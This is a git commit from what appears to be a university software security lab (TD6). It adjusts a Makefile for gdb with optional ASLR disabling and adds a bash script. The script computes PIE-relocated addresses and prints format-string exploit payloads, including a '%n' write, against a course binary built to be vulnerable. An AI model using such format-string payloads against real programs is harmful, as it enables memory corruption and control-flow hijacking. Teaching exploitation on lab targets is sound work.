Finish TD6

This commit is contained in:
Yorick Barbanneau 2023-04-12 23:35:55 +02:00
parent 07eb566445
commit 7c934bcefb
3 changed files with 236 additions and 29 deletions

View file

@ -4,7 +4,7 @@ SRC = $(wildcard *.c)
TGT = $(subst .c,,$(SRC))
BUILD_DIR = build
DUMP_DIR = dump
SETARCH ?= 0
pframe:
curl -o pframe.tgz https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
@ -36,9 +36,16 @@ build: $(addprefix $(BUILD_DIR)/, $(addsuffix _32, $(TGT))) \
$(addprefix $(BUILD_DIR)/, $(addsuffix _64-pie, $(TGT))) \
PHONY: gdb_% configure
gdb_%: $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} setarch -R gdb $< --command=$(subst gdb_,,$@).gdb
ifeq ($(SETARCH),1)
gdb_command = setarch -R gdb
else
gdb_command = gdb
endif
PHONY: gdb_%
gdb_%: configure $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} $(gdb_command) \
$(addprefix $(BUILD_DIR)/, $(subst gdb_,,$@)) \
--command=$(subst gdb_,,$@).gdb
PHONY: clean

View file

@ -0,0 +1,108 @@
#!/bin/bash
#
#
usage() {
cat <<EOF
hack the vulnerable!
This script calculate for you all you need to hack the \`vulnerable-1_32-pie\`
TD6 part1 question 9 of software security course
OPTIONS
-h | --help show this message
-a | --address set the \`foo()\` return address if not set, script will
ask you to put it on stdin
-i | --show-info display all informations abous processing addresses
EOF
}
error() {
>&2 printf "\e[31mError\e[0m: %s\n" "$1"
}
info() {
local message="$*"
[[ -z $DEBUG || $DEBUG -ne 1 ]] && return
[ -z "$message" ] && return
# On affiche les informations supplémentaires pour le débogage
printf "\n\e[34mInfo\e[0m: %s\n" "$message"
}
process_args() {
while :; do
case $1 in
-h|-\?|--help)
usage
exit 0
;;
-a|--address)
addr="$2"
shift
;;
-i|--show-information)
DEBUG=1
;;
*)
break
esac
shift
done
}
process_args "$@"
if [ -z "${addr:-}" ]
then
printf "Enter the return address for foo(): "
read -r addr
else
info "I have the address: $addr"
fi
if [[ $addr =~ ^0x.*$ ]]
then
addr=${addr:2:8}
info "remove 0x on address begining $addr"
fi
if [[ ! $addr =~ ^[0-9a-fA-F]{8}$ ]]
then
error "$addr is not a valid address"
exit 10
fi
for e in "main" "target"
do
v=$(objdump -D build/vulnerable-1_32-pie | grep "<$e>" | awk '{print $1}')
printf -v "$e" "%s" "$v"
done
info "Get main() and target address with objdump
* main: $main
* target: $target"
delta=$((16#$target - 16#$main))
info "Caclulate the difference between this two address:
* delta: $delta"
pie_main=${addr:0:6}${main:6:4}
info "get the main() address on our executable : get the 3 fist numbers of addr
and the last one of the main address reported by \`objdump\`
* main() address on pie process: $pie_main"
printf -v pie_target "%x" $((16#$pie_main + delta ))
info "Add the delta to main() address
* \`target\` address on pie process: $pie_target"
printf -v get_target "\\\\\\\x%s" "${pie_target:6:2}" "${pie_target:4:2}" "${pie_target:2:2}" "${pie_target:0:2}"
info "Put the target address in the right order:
* address payload: $get_target"
printf "\nGet the Target :\n"
printf "%s %s\n" "$get_target" "%23\$s"
printf "\nModify the Target:\n"
printf "%s %s\n" "$get_target" "%23\$s"
printf "\nHack the Target:\n"
printf "%s%s\n" "$get_target" "%152896p%23\$n"